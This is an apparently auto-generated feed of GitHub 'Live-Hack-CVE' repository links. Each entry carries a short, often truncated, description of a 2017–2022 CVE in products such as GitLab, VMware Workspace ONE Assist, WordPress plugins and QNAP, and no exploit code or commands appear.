**Insufficiently Protected Credentials vulnerability exists in homeLYnk (Wiser For KNX) and spaceLYnk V2.60 and prior that could cause unauthorized access of when credentials are discovered after a brute force attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22737](https://github.com/Live-Hack-CVE/CVE-2021-22737) create time: 2022-12-28T10:14:58Z

**Affected versions of Atlassian Jira Server and Data Center allow authenticated remote attackers to add administrator groups to filter subscriptions via a Broken Access Control vulnerability in the /secure/EditSubscription.jspa endpoint. The affected versions are before version 8.13.21, and from version 8.14.0 before 8. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43946](https://github.com/Live-Hack-CVE/CVE-2021-43946) create time: 2022-12-28T10:12:15Z

**Spacewalk 2.10, and derivatives such as Uyuni 2021.08, allows code injection. rhn-config-satellite.pl doesn't sanitize the configuration filename used to append Spacewalk-specific key-value pair. The script is intended to be run by the tomcat user account with Sudo, according to the installation setup. This can lead to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40348](https://github.com/Live-Hack-CVE/CVE-2021-40348) create time: 2022-12-28T10:11:50Z

**The WordPress Online Booking and Scheduling Plugin WordPress plugin before 20.3.1 does not escape the Staff Full Name field before outputting it back in a page, which could lead to a Stored Cross-Site Scripting issue CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24930](https://github.com/Live-Hack-CVE/CVE-2021-24930) create time: 2022-12-28T10:11:25Z

**Cross-Site Request Forgery (CSRF) vulnerability discovered in Contact Form 7 Database Addon – CFDB7 WordPress plugin (versions <= 1.2.5.9). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36886](https://github.com/Live-Hack-CVE/CVE-2021-36886) create time: 2022-12-28T10:11:14Z

**Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability discovered in Contact Form 7 Database Addon – CFDB7 WordPress plugin (versions <= 1.2.6.1). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36885](https://github.com/Live-Hack-CVE/CVE-2021-36885) create time: 2022-12-28T10:11:10Z

**An issue was discovered in Dropbear through 2020.81. Due to a non-RFC-compliant check of the available authentication methods in the client-side SSH code, it is possible for an SSH server to change the login process in its favor. This attack can bypass additional security measures such as FIDO2 tokens or SSH-Askpass. T CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36369](https://github.com/Live-Hack-CVE/CVE-2021-36369) create time: 2022-12-28T10:09:57Z

**Unvalidated input in the Contact Form 7 Database Addon plugin, versions before 1.2.5.6, was prone to a vulnerability that lets remote attackers inject arbitrary formulas into CSV files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24144](https://github.com/Live-Hack-CVE/CVE-2021-24144) create time: 2022-12-28T10:09:43Z

**K3s in SUSE Rancher allows any user with direct access to the datastore, or a copy of a datastore backup, to extract the cluster's confidential keying material (cluster certificate authority private keys, secrets encryption configuration passphrase, etc.) and decrypt it, without having to know the token value. This iss CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32001](https://github.com/Live-Hack-CVE/CVE-2021-32001) create time: 2022-12-28T10:07:08Z

**A Insufficiently Protected Credentials vulnerability in SUSE Rancher allows authenticated Cluster Owners, Cluster Members, Project Owners and Project Members to read credentials, passwords and API tokens that have been stored in cleartext and exposed via API endpoints. This issue affects: SUSE Rancher Rancher versions CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36783](https://github.com/Live-Hack-CVE/CVE-2021-36783) create time: 2022-12-28T10:07:04Z

**In Phoenix Contact: FL MGUARD DM version 1.12.0 and 1.13.0 access to the Apache web server being installed as part of the FL MGUARD DM on Microsoft Windows does not require login credentials even if configured during installation.Attackers with network access to the Apache web server can download and therefore read mGu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34579](https://github.com/Live-Hack-CVE/CVE-2021-34579) create time: 2022-12-28T09:33:59Z

**In the Kaden PICOFLUX AiR water meter an adversary can read the values through wireless M-Bus mode 5 with a hardcoded shared key while being adjacent to the device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34577](https://github.com/Live-Hack-CVE/CVE-2021-34577) create time: 2022-12-28T09:33:44Z

**mm-wki v0.2.1 is vulnerable to Cross Site Scripting (XSS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40289](https://github.com/Live-Hack-CVE/CVE-2021-40289) create time: 2022-12-28T09:33:18Z

**XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's secur CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39144](https://github.com/Live-Hack-CVE/CVE-2021-39144) create time: 2022-12-28T09:32:17Z

**Payara Micro Community 5.2021.6 and below allows Directory Traversal. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41381](https://github.com/Live-Hack-CVE/CVE-2021-41381) create time: 2022-12-28T09:32:12Z

**xpdfreader 4.03 is vulnerable to Buffer Overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40226](https://github.com/Live-Hack-CVE/CVE-2021-40226) create time: 2022-12-28T09:31:26Z

**Uncontrolled search path in the software installer for Intel(R) System Studio for all versions, may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33064](https://github.com/Live-Hack-CVE/CVE-2021-33064) create time: 2022-12-28T09:29:31Z

**A flaw was found in libcaca. A heap buffer overflow in export.c in function export_tga might lead to memory corruption and other potential consequences. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30498](https://github.com/Live-Hack-CVE/CVE-2021-30498) create time: 2022-12-28T09:27:38Z

**A flaw was found in binutils readelf 2.35 program. An attacker who is able to convince a victim using readelf to read a crafted file could trigger a stack buffer overflow, out-of-bounds write of arbitrary data supplied by the attacker. The highest impact of this flaw is to confidentiality, integrity, and availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20294](https://github.com/Live-Hack-CVE/CVE-2021-20294) create time: 2022-12-28T09:27:35Z

**A flaw has been found in libssh in versions prior to 0.9.6. The SSH protocol keeps track of two shared secrets during the lifetime of the session. One of them is called secret_hash and the other session_id. Initially, both of them are the same, but after key re-exchange, previous session_id is kept and used as an input CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3634](https://github.com/Live-Hack-CVE/CVE-2021-3634) create time: 2022-12-28T09:27:19Z

**A use-after-free vulnerability exists in the NMR::COpcPackageReader::releaseZIP() functionality of 3MF Consortium lib3mf 2.0.0. A specially crafted 3MF file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21772](https://github.com/Live-Hack-CVE/CVE-2021-21772) create time: 2022-12-28T09:27:12Z

**A race condition was found in the Linux kernel's ebpf verifier between bpf_map_update_elem and bpf_map_freeze due to a missing lock in kernel/bpf/syscall.c. In this flaw, a local user with a special privilege (cap_sys_admin or cap_bpf) can modify the frozen mapped address space. This flaw affects kernel versions prior CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4001](https://github.com/Live-Hack-CVE/CVE-2021-4001) create time: 2022-12-28T09:27:08Z

**A maliciously crafted JT file in Autodesk Inventor 2022, 2021, 2020, 2019 and AutoCAD 2022 may be forced to read beyond allocated boundaries when parsing the JT file. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40158](https://github.com/Live-Hack-CVE/CVE-2021-40158) create time: 2022-12-28T09:25:27Z

**An Information Disclosure vulnerability for JT files in Autodesk Inventor 2022, 2021, 2020, 2019 in conjunction with other vulnerabilities may lead to code execution through maliciously crafted JT files in the context of the current process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40159](https://github.com/Live-Hack-CVE/CVE-2021-40159) create time: 2022-12-28T09:25:20Z

**Improper input validation in the firmware for some Intel(R) Server Board M10JNP Family before version 7.216 may allow a privileged user to potentially enable an escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0185](https://github.com/Live-Hack-CVE/CVE-2021-0185) create time: 2022-12-28T09:23:18Z

**Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in James Lao's Simple Video Embedder plugin <= 2.2 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44590](https://github.com/Live-Hack-CVE/CVE-2022-44590) create time: 2022-12-28T10:17:08Z

**VMware Workspace ONE Assist prior to 22.10 contains an Authentication Bypass vulnerability. A malicious actor with network access to Workspace ONE Assist may be able to obtain administrative access without the need to authenticate to the application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31685](https://github.com/Live-Hack-CVE/CVE-2022-31685) create time: 2022-12-28T10:16:58Z

**VMware Workspace ONE Assist prior to 22.10 contains a Broken Access Control vulnerability. A malicious actor with network access to Workspace ONE Assist may be able to obtain administrative access without the need to authenticate to the application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31687](https://github.com/Live-Hack-CVE/CVE-2022-31687) create time: 2022-12-28T10:16:50Z

**VMware Workspace ONE Assist prior to 22.10 contains a Broken Authentication Method vulnerability. A malicious actor with network access to Workspace ONE Assist may be able to obtain administrative access without the need to authenticate to the application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31686](https://github.com/Live-Hack-CVE/CVE-2022-31686) create time: 2022-12-28T10:16:47Z

**VMware Workspace ONE Assist prior to 22.10 contains a Reflected cross-site scripting (XSS) vulnerability. Due to improper user input sanitization, a malicious actor with some user interaction may be able to inject javascript code in the target user's window. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31688](https://github.com/Live-Hack-CVE/CVE-2022-31688) create time: 2022-12-28T10:16:39Z

**VMware Workspace ONE Assist prior to 22.10 contains a Session fixation vulnerability. A malicious actor who obtains a valid session token may be able to authenticate to the application using that token. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31689](https://github.com/Live-Hack-CVE/CVE-2022-31689) create time: 2022-12-28T10:16:36Z

**An improper authorization issue in GitLab CE/EE affecting all versions from 14.4 prior to 15.3.5, 15.4 prior to 15.4.4, and 15.5 prior to 15.5.2 allows an attacker to read variables set directly in a GitLab CI/CD configuration file they don't have access to. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3793](https://github.com/Live-Hack-CVE/CVE-2022-3793) create time: 2022-12-28T10:16:31Z

**A cross-site scripting issue has been discovered in GitLab CE/EE affecting all versions prior to 15.3.5, 15.4 prior to 15.4.4, and 15.5 prior to 15.5.2. It was possible to exploit a vulnerability in setting the labels colour feature which could lead to a stored XSS that allowed attackers to perform arbitrary actions on CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3265](https://github.com/Live-Hack-CVE/CVE-2022-3265) create time: 2022-12-28T10:16:15Z

**A CWE-352: Cross-Site Request Forgery (CSRF) exists that could cause a remote attacker to gain unauthorized access to the product when conducting cross-domain attacks based on same-origin policy or cross-site request forgery protections bypass. Affected Product: EcoStruxure EV Charging Expert (formerly known as EVlink CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22808](https://github.com/Live-Hack-CVE/CVE-2022-22808) create time: 2022-12-28T10:14:55Z

**An uncontrolled resource consumption issue when parsing URLs in GitLab CE/EE affecting all versions prior to 15.3.5, 15.4 prior to 15.4.4, and 15.5 prior to 15.5.2 allows an attacker to cause performance issues and potentially a denial of service on the GitLab instance. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3818](https://github.com/Live-Hack-CVE/CVE-2022-3818) create time: 2022-12-28T10:14:51Z

**An information disclosure issue in GitLab CE/EE affecting all versions from 14.4 prior to 15.3.5, 15.4 prior to 15.4.4, and 15.5 prior to 15.5.2 allows an attacker to use GitLab Flavored Markdown (GFM) references in a Jira issue to disclose the names of resources they don't have access to. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2761](https://github.com/Live-Hack-CVE/CVE-2022-2761) create time: 2022-12-28T10:14:47Z

**An open redirect in GitLab CE/EE affecting all versions from 10.1 prior to 15.3.5, 15.4 prior to 15.4.4, and 15.5 prior to 15.5.2 allows an attacker to trick users into visiting a trustworthy URL and being redirected to arbitrary content. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3280](https://github.com/Live-Hack-CVE/CVE-2022-3280) create time: 2022-12-28T10:14:44Z

**Bypass of healthcheck endpoint allow list affecting all versions from 12.0 prior to 15.2.5, 15.3 prior to 15.3.4, and 15.4 prior to 15.4.1 allows an unauthorized attacker to prevent access to GitLab CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3285](https://github.com/Live-Hack-CVE/CVE-2022-3285) create time: 2022-12-28T10:14:40Z

**Web Account Manager Information Disclosure Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38046](https://github.com/Live-Hack-CVE/CVE-2022-38046) create time: 2022-12-28T10:14:36Z

**An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.1 before 15.3.5, all versions starting from 15.4 before 15.4.4, all versions starting from 15.5 before 15.5.2. A malicious maintainer could exfiltrate a Datadog integration's access token by modifying the integration URL such that auth CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3483](https://github.com/Live-Hack-CVE/CVE-2022-3483) create time: 2022-12-28T10:14:32Z

**An improper authorization issue in GitLab CE/EE affecting all versions from 15.0 prior to 15.3.5, 15.4 prior to 15.4.4, and 15.5 prior to 15.5.2 allows a malicious users to set emojis on internal notes they don't have access to. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3819](https://github.com/Live-Hack-CVE/CVE-2022-3819) create time: 2022-12-28T10:14:27Z

**Lack of sand-boxing of OpenAPI documents in GitLab CE/EE affecting all versions from 12.6 prior to 15.3.5, 15.4 prior to 15.4.4, and 15.5 prior to 15.5.2 allows an attacker to trick a user to click on the Swagger OpenAPI viewer and issue HTTP requests that affect the victim's account. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3726](https://github.com/Live-Hack-CVE/CVE-2022-3726) create time: 2022-12-28T10:14:24Z

**Improper authorization in GitLab CE/EE affecting all versions from 7.14 prior to 15.3.5, 15.4 prior to 15.4.4, and 15.5 prior to 15.5.2 allows a user retrying a job in a downstream pipeline to take ownership of the retried jobs in the upstream pipeline even if the user doesn't have access to that project. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3706](https://github.com/Live-Hack-CVE/CVE-2022-3706) create time: 2022-12-28T10:14:20Z

**Incorrect authorization during display of Audit Events in GitLab EE affecting all versions from 14.5 prior to 15.3.5, 15.4 prior to 15.4.4, and 15.5 prior to 15.5.2, allowed Developers to view the project's Audit Events and Developers or Maintainers to view the group's Audit Events. These should have been restricted to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3413](https://github.com/Live-Hack-CVE/CVE-2022-3413) create time: 2022-12-28T10:14:16Z

**An open redirect vulnerability in GitLab EE/CE affecting all versions from 9.3 prior to 15.3.5, 15.4 prior to 15.4.4, and 15.5 prior to 15.5.2, allows an attacker to redirect users to an arbitrary location if they trust the URL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3486](https://github.com/Live-Hack-CVE/CVE-2022-3486) create time: 2022-12-28T10:14:13Z

**tasklists is a tasklists plugin for GLPI (Kanban). Versions prior to 2.0.3 are vulnerable to Cross-site Scripting. Cross-site Scripting (XSS) - Create XSS in task content (when add it). This issue is patched in version 2.0.3. There are no known workarounds. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39398](https://github.com/Live-Hack-CVE/CVE-2022-39398) create time: 2022-12-28T10:14:09Z

**Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Versions prior to 4.10.18, and prior to 5.3.1 on the 5.X branch, are vulnerable to Remote Code Execution via prototype pollution. An attacker can use this prototype pollution sink to trigger a remote code execution t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39396](https://github.com/Live-Hack-CVE/CVE-2022-39396) create time: 2022-12-28T10:13:40Z

**Windows Network Address Translation (NAT) Denial of Service Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41058](https://github.com/Live-Hack-CVE/CVE-2022-41058) create time: 2022-12-28T10:13:36Z

**Windows Scripting Languages Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-41128. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41118](https://github.com/Live-Hack-CVE/CVE-2022-41118) create time: 2022-12-28T10:13:32Z

**Network Policy Server (NPS) RADIUS Protocol Denial of Service Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41056](https://github.com/Live-Hack-CVE/CVE-2022-41056) create time: 2022-12-28T10:13:29Z

**Windows Human Interface Device Information Disclosure Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41055](https://github.com/Live-Hack-CVE/CVE-2022-41055) create time: 2022-12-28T10:13:25Z

**Visual Studio Remote Code Execution Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41119](https://github.com/Live-Hack-CVE/CVE-2022-41119) create time: 2022-12-28T10:13:22Z

**Microsoft Office Graphics Remote Code Execution Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41107](https://github.com/Live-Hack-CVE/CVE-2022-41107) create time: 2022-12-28T10:13:19Z

**Microsoft SharePoint Server Spoofing Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41122](https://github.com/Live-Hack-CVE/CVE-2022-41122) create time: 2022-12-28T10:13:15Z

**raptor_xml_writer_start_element_common in raptor_xml_writer.c in Raptor RDF Syntax Library 2.0.15 miscalculates the maximum nspace declarations for the XML writer, leading to heap-based buffer overflows (sometimes seen in raptor_qname_format_as_xml). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-18926](https://github.com/Live-Hack-CVE/CVE-2017-18926) create time: 2022-12-28T08:50:39Z

**If exploited, this command injection vulnerability could allow remote attackers to execute arbitrary commands. This issue affects: QNAP Systems Inc. Music Station versions prior to 5.1.13; versions prior to 5.2.9; versions prior to 5.3.11. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19950](https://github.com/Live-Hack-CVE/CVE-2018-19950) create time: 2022-12-28T08:52:44Z

**If exploited, this cross-site scripting vulnerability could allow remote attackers to inject malicious code. This issue affects: QNAP Systems Inc. Music Station versions prior to 5.1.13; versions prior to 5.2.9; versions prior to 5.3.11. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19951](https://github.com/Live-Hack-CVE/CVE-2018-19951) create time: 2022-12-28T08:51:30Z

**The cross-site scripting vulnerability has been reported to affect earlier versions of Photo Station. If exploited, the vulnerability could allow remote attackers to inject malicious code. This issue affects: QNAP Systems Inc. Photo Station versions prior to 5.7.11; versions prior to 6.0.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19954](https://github.com/Live-Hack-CVE/CVE-2018-19954) create time: 2022-12-28T08:50:54Z

**The cross-site scripting vulnerability has been reported to affect earlier versions of Photo Station. If exploited, the vulnerability could allow remote attackers to inject malicious code. This issue affects: QNAP Systems Inc. Photo Station versions prior to 5.7.11; versions prior to 6.0.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19955](https://github.com/Live-Hack-CVE/CVE-2018-19955) create time: 2022-12-28T08:50:49Z

**The cross-site scripting vulnerability has been reported to affect earlier versions of Photo Station. If exploited, the vulnerability could allow remote attackers to inject malicious code. This issue affects: QNAP Systems Inc. Photo Station versions prior to 5.7.11; versions prior to 6.0.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19956](https://github.com/Live-Hack-CVE/CVE-2018-19956) create time: 2022-12-28T08:50:46Z

**Firefox sometimes ran the onload handler for SVG elements that the DOM sanitizer decided to remove, resulting in JavaScript being executed after pasting attacker-controlled data into a contenteditable element. This vulnerability affects Firefox < 81, Thunderbird < 78.3, and Firefox ESR < 78.3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15676](https://github.com/Live-Hack-CVE/CVE-2020-15676) create time: 2022-12-28T08:53:10Z

**By exploiting an Open Redirect vulnerability on a website, an attacker could have spoofed the site displayed in the download file dialog to show the original site (the one suffering from the open redirect) rather than the site the file was actually downloaded from. This vulnerability affects Firefox < 81, Thunderbird < CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15677](https://github.com/Live-Hack-CVE/CVE-2020-15677) create time: 2022-12-28T08:52:51Z

**Devices supporting Bluetooth before 5.1 may allow man-in-the-middle attacks, aka BLURtooth. Cross Transport Key Derivation in Bluetooth Core Specification v4.2 and v5.0 may permit an unauthenticated user to establish a bonding with one transport, either LE or BR/EDR, and replace a bonding already established on the opp CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15802](https://github.com/Live-Hack-CVE/CVE-2020-15802) create time: 2022-12-28T08:52:48Z

**Improper access control vulnerability in Synology Router Manager (SRM) before 1.2.4-8081 allows remote attackers to access restricted resources via inbound QuickConnect traffic. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27655](https://github.com/Live-Hack-CVE/CVE-2020-27655) create time: 2022-12-28T08:52:41Z

**Algorithm downgrade vulnerability in QuickConnect in Synology DiskStation Manager (DSM) before 6.2.3-25426-2 allows man-in-the-middle attackers to spoof servers and obtain sensitive information via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27652](https://github.com/Live-Hack-CVE/CVE-2020-27652) create time: 2022-12-28T08:52:37Z

**It was found that Keycloak before version 12.0.0 would permit a user with only view-profile role to manage the resources in the new account console, allowing access and modification of data the user was not intended to have. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14389](https://github.com/Live-Hack-CVE/CVE-2020-14389) create time: 2022-12-28T08:52:11Z

**When recursing through graphical layers while scrolling, an iterator may have become invalid, resulting in a potential use-after-free. This occurs because the function APZCTreeManager::ComputeClippedCompositionBounds did not follow iterator invalidation rules. This vulnerability affects Firefox < 81, Thunderbird < 78.3 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15678](https://github.com/Live-Hack-CVE/CVE-2020-15678) create time: 2022-12-28T08:51:47Z

**Singularity (an open source container platform) from version 3.1.1 through 3.6.3 has a vulnerability. Due to insecure handling of path traversal and the lack of path sanitization within `unsquashfs`, it is possible to overwrite/create any files on the host filesystem during the extraction with a crafted squashfs filesy CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15229](https://github.com/Live-Hack-CVE/CVE-2020-15229) create time: 2022-12-28T08:51:40Z

**Algorithm downgrade vulnerability in QuickConnect in Synology Router Manager (SRM) before 1.2.4-8081 allows man-in-the-middle attackers to spoof servers and obtain sensitive information via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27653](https://github.com/Live-Hack-CVE/CVE-2020-27653) create time: 2022-12-28T08:51:36Z

**Improper access control vulnerability in lbd in Synology Router Manager (SRM) before 1.2.4-8081 allows remote attackers to execute arbitrary commands via port (1) 7786/tcp or (2) 7787/tcp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27654](https://github.com/Live-Hack-CVE/CVE-2020-27654) create time: 2022-12-28T08:51:33Z

**Code execution with escalated privileges vulnerability in Micro Focus products Operation Bridge Manager and Operation Bridge (containerized). The vulneravility affects: 1.) Operation Bridge Manager versions: 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, 10.63,10.62, 10.61, 10.60, 10.12, 10.11, 10.10 and all earlier vers CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11858](https://github.com/Live-Hack-CVE/CVE-2020-11858) create time: 2022-12-28T08:50:42Z

**A Red Hat only CVE-2020-12352 regression issue was found in the way the Linux kernel's Bluetooth stack implementation handled the initialization of stack memory when handling certain AMP packets. This flaw allows a remote attacker in an adjacent range to leak small portions of stack memory on the system by sending spec CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25662](https://github.com/Live-Hack-CVE/CVE-2020-25662) create time: 2022-12-28T08:50:35Z

**A flaw was found in ImageMagick in MagickCore/quantum-export.c. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of values outside the range of type `unsigned long long` as well as a shift exponent that is too large for 64-bit type. This would most lik CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27751](https://github.com/Live-Hack-CVE/CVE-2020-27751) create time: 2022-12-28T08:50:32Z

**Bluetooth LE and BR/EDR secure pairing in Bluetooth Core Specification 2.1 through 5.2 may permit a nearby man-in-the-middle attacker to identify the Passkey used during pairing (in the Passkey authentication procedure) by reflection of the public key and the authentication evidence of the initiating device, potentiall CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26558](https://github.com/Live-Hack-CVE/CVE-2020-26558) create time: 2022-12-28T08:50:28Z

**Arbitrary code execution vulnerability affecting multiple Micro Focus products. 1.) Operation Bridge Manager affecting version: 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, versions 10.6x and 10.1x and older versions. 2.) Application Performance Management affecting versions : 9.51, 9.50 and 9.40 with uCMDB 10.33 CUP 3 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11853](https://github.com/Live-Hack-CVE/CVE-2020-11853) create time: 2022-12-28T08:50:18Z

**An issue was discovered in the lever crate before 0.1.1 for Rust. AtomicBox<T> implements the Send and Sync traits for all types T. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36457](https://github.com/Live-Hack-CVE/CVE-2020-36457) create time: 2022-12-28T08:44:45Z

**In WAGO I/O-Check Service in multiple products an attacker can send a specially crafted packet containing OS commands to crash the diagnostic tool and write memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34569](https://github.com/Live-Hack-CVE/CVE-2021-34569) create time: 2022-12-28T08:53:06Z

**In WAGO I/O-Check Service in multiple products an unauthenticated remote attacker can send a specially crafted packet containing OS commands to provoke a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34568](https://github.com/Live-Hack-CVE/CVE-2021-34568) create time: 2022-12-28T08:53:02Z

**In WAGO I/O-Check Service in multiple products an unauthenticated remote attacker can send a specially crafted packet containing OS commands to provoke a denial of service and an limited out-of-bounds read. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34567](https://github.com/Live-Hack-CVE/CVE-2021-34567) create time: 2022-12-28T08:52:58Z

**In WAGO I/O-Check Service in multiple products an unauthenticated remote attacker can send a specially crafted packet containing OS commands to crash the iocheck process and write memory resulting in loss of integrity and DoS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34566](https://github.com/Live-Hack-CVE/CVE-2021-34566) create time: 2022-12-28T08:52:55Z

**The TaxoPress – Create and Manage Taxonomies, Tags, Categories WordPress plugin before 3.0.7.2 does not sanitise its Taxonomy description field, allowing high privilege users to set JavaScript payload in them even when the unfiltered_html capability is disallowed, leading to an authenticated Stored Cross-Site Scripting CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24444](https://github.com/Live-Hack-CVE/CVE-2021-24444) create time: 2022-12-28T08:50:25Z

**Affected versions of Atlassian Jira Server and Data Center allow authenticated but non-admin remote attackers to edit email batch configurations via an Improper Authorization vulnerability in the /secure/admin/ConfigureBatching!default.jspa endpoint. The affected versions are before version 8.20.7. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41313](https://github.com/Live-Hack-CVE/CVE-2021-41313) create time: 2022-12-28T08:50:14Z

**Layer 2 network filtering capabilities such as IPv6 RA guard or ARP inspection can be bypassed using combinations of VLAN 0 headers and LLC/SNAP headers. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27853](https://github.com/Live-Hack-CVE/CVE-2021-27853) create time: 2022-12-28T08:48:26Z

**Xiongmai Camera XM-JPR2-LX V4.02.R12.A6420987.10002.147502.00000 is vulnerable to plain-text traffic sniffing. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38828](https://github.com/Live-Hack-CVE/CVE-2021-38828) create time: 2022-12-28T08:47:02Z

**Xiongmai Camera XM-JPR2-LX V4.02.R12.A6420987.10002.147502.00000 is vulnerable to account takeover. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38827](https://github.com/Live-Hack-CVE/CVE-2021-38827) create time: 2022-12-28T08:46:58Z

**A flaw was found in SQLite's SELECT query functionality (src/select.c). This flaw allows an attacker who is capable of running SQL queries locally on the SQLite database to cause a denial of service or possible code execution by triggering a use-after-free. The highest threat from this vulnerability is to system availa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20227](https://github.com/Live-Hack-CVE/CVE-2021-20227) create time: 2022-12-28T08:46:23Z

**PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. In PJSIP before version 2.11.1, there are a couple of issues found in the SSL socket. First, a race condition between callback and destroy, due to the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32686](https://github.com/Live-Hack-CVE/CVE-2021-32686) create time: 2022-12-28T08:46:00Z

